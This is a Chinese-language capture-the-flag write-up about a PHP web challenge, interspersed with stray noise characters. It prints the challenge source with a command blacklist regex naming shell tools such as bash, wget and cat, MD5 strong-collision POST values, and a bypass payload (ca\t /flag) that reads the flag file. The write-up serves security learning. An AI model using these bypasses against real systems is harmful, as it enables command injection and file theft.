|
|
# y# q7 R7 {/ m8 r7 A* S
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>) I% e7 R9 b, I3 h
<p> </p>
5 Y8 v' B0 r7 a9 j<p> </p>6 \4 X6 E2 p1 J& T2 {1 [
<p> 题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,同时查看源代码</p>. O4 Z1 j4 i" a
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>4 M9 o) k p$ V
<p> </p>; `/ i: M) n. }; G* Y: e7 U* p$ n
<p> </p>% l% X g1 q4 p+ P, X/ A- K# G
<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>+ D8 z0 a- Q- M. _8 G
<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>; q! k& G- K& X
<p>首先把那个进行一次base64位解码</p>
( S* x {+ l0 }9 N<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>( J0 Q' C. Z4 S' u) v, c
<p> </p>/ L) a! H3 }" C7 q
<p> </p>
6 r8 N! i3 O: I6 v! m0 p5 E8 a3 S<p> 解码一次以后还是很像base64编码,于是又解码一次</p>8 g* o1 n, y# _5 ~3 S* Z6 z
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
! M ^$ u; s" x* n- e3 E<p> </p>
& ~1 N: o# y- E5 s<p> </p>
3 M) i3 E4 o/ M7 Y<p> 然后用hex解码一下得到了</p>
1 j' \/ E1 h5 X. I<div class="cnblogs_Highlighter">
# C& U% p9 i6 q# R$ K<pre class="brush:sql;gutter:true;">555.png7 L: L2 s8 D% ]2 G% J
</pre>
! W; G& x: ?! L" `! F; z</div>
\. z, _6 i% @<p> 用同样的方法把index.php进行加密</p>
4 u, @) N7 @! i; _% ]! E* i' l+ I: M<div class="cnblogs_Highlighter">+ [; U }+ @+ m9 o3 o% t8 ~6 ]: M
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3+ @# M; _. x4 B+ C/ \* K9 a& v' f
</pre>$ E4 B; ^( w3 u2 G6 B0 R5 e) E
</div>
, v' h1 ?/ s- S/ z6 n2 A6 b<p> 然后输入到地址栏</p>
% w! u9 ^* Z- w/ D& ]<p> 然后查看源代码,把源代码里面的那一串base64的编码解码</p>0 F: l9 q0 W4 T. a; f% ~; [5 [/ ^
<div class="cnblogs_code">
% z, D, H: q4 C* I" U7 {<pre><?<span style="color: rgba(0, 0, 0, 1)">php- ?2 K. c0 J, t+ M2 a: m
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
! i: A( Z4 c3 z B3 k</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
* ~' P# q; r9 ^; w</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
6 n) C: i) A9 X2 u- `1 B5 Z</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">])) ) o8 h0 ]& [( E# a
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='<span style="color: rgba(0, 0, 0, 1)">);) i. J1 V* o w
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));. P4 `$ ]. I$ c) c
" K8 Q$ H. \0 J, N7 C# ^</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);3 l+ K' h2 z& g4 ?' t, U( m
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
3 `. g8 ]1 |/ T8 a y0 G* t/ V </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '<img src ="./ctf3.jpeg">'<span style="color: rgba(0, 0, 0, 1)">;
1 y$ H8 B2 E0 ]' J7 Q </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);
3 @4 s+ g- l# R( ^ H+ z} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
& B1 z/ m+ q1 }' f/ O) s: H </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));$ i; p9 A0 f, H6 k1 z8 q
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'></img>"<span style="color: rgba(0, 0, 0, 1)">;
+ m- _1 z v% U! P. o </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
+ r* x4 I5 I7 @8 c4 ~: F' g}( X6 d0 ]' j# _/ f* e
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;+ O* t0 g5 W! ]- ?- }6 w6 V8 p1 W
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
4 C+ ^) Z2 M! j1 e9 u& ]+ j</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {" \/ g& L a' T0 \4 g6 Z: l
</span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);8 M8 `# x7 R% i1 e. J/ U0 `
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
( ]1 _3 J6 r( ^2 I: m4 S/ J} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
* k. T. Z" e" g c </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
/ `# S5 z8 Y- t9 e0 J% \' n6 {- c& F </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
1 k7 R, c& t4 a } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
1 ?5 v1 r$ M* y3 K+ q( V$ J& H* ^ </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
4 z, C& E% l1 G+ \2 g! m* E% t) y* ? }0 H+ a$ q7 t5 S q- W% d
}
( T' n& H) d- M$ K- P f4 p
4 x- } }6 B" I$ J</span>?>" n, J- \, |7 k
<html>% I O# r) D; J" i" G
<style><span style="color: rgba(0, 0, 0, 1)">' ~5 q5 y+ \/ k2 I# O. c
body{: d4 F2 H6 H' Z. P
background</span>:url(./bj.png) no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;" L0 T; z+ j# a, |
background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
- r& i. _ C. ~/ t: I background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
4 P% x" _7 U! K V- X: C9 Y background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
- z7 ^8 ?( @# E! J" v<span style="color: rgba(0, 0, 0, 1)">}$ L/ d" x; q. ?1 R3 r0 H( E( A1 d' o
</span></style>
# O9 ]" C d0 b$ c: [! P<body>$ P# d% |6 H$ n8 k' J9 O. F( F0 c
</body>9 p% J2 E" L: U1 V( G6 U3 [
</html></pre>* \, W) Q4 F8 Z2 m2 S8 s
</div>: L. Z* o2 U3 _3 g1 q2 G/ J
<p>结合前面的推断,关键代码就在</p>5 t5 L* |; ]6 Q; ]. c) B
<div class="cnblogs_code">7 W ~5 N( [6 ]/ v7 E
<pre> <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
7 b6 F( v% b6 A% H" Q+ g P! Q2 x </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
+ c: g; g( i, w- Q6 _* r } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {, x4 s$ d* A( e2 ~7 V9 K- R
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
- L7 }1 e7 p% t }</span></pre>! Q7 u& j8 w0 E: U, q! R
</div>( ~: ?6 z2 e$ x$ O
<p>这种MD5是md5强碰撞</p>8 @, T: Q f# E4 P, I ^
<div class="cnblogs_Highlighter">5 d; y& m& E- @2 a; v, k
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
& A/ T H9 M( Z</pre>/ Z! H% ~4 F' P
</div>
* v/ o6 i9 ^/ r/ h. R5 T3 _: X<div class="cnblogs_Highlighter">- X6 r* R# K2 X @/ `- J
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
! U' G9 X* u; t! J4 g</pre>
# s1 n- V& _9 K* X; ^4 _</div>
8 K# g. z: s1 }+ c5 u4 q$ e$ O4 F<p> 只需要这样就可以把cmd里面的当成命令来处理。</p>
a9 m5 v2 N4 Q( Q<p>于是采用payload:</p>
$ U# Z9 Q+ ?9 t+ z<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
. s: f1 ^2 s3 P) j. ]<p> </p>
# o9 s8 x& g6 |$ o<p> 因为'\'并没有被屏蔽所以可以这么绕过</p>
. `+ w; \& S/ b6 o% z<p>ls和l\s在命令执行的时候结果是一样的。</p>
! _! S/ U$ I* @7 M6 V/ ]<p>然后发现根目录里面有/flag</p>
' J6 y: Z% @- \0 k, H<p>于是payload:</p>
W7 o- ~. Q3 \! ~# v3 G0 }( \<div class="cnblogs_Highlighter">7 W: Q0 u- S. U
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag' v* Q2 T* k M$ ?
</pre>
( j) b! F$ p& O) O9 Z</div>
( m$ P1 t( s. S% q$ p6 P% ^: ~, w' C<p> 对于这个题目,因为他没有屏蔽sort和dir</p>
5 `! V* B. p: U<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>
5 y2 D& ^7 w, Z3 V; y<p> </p>
$ V" a2 x' w2 g7 L |
|
发表于 2022-2-12 14:35:42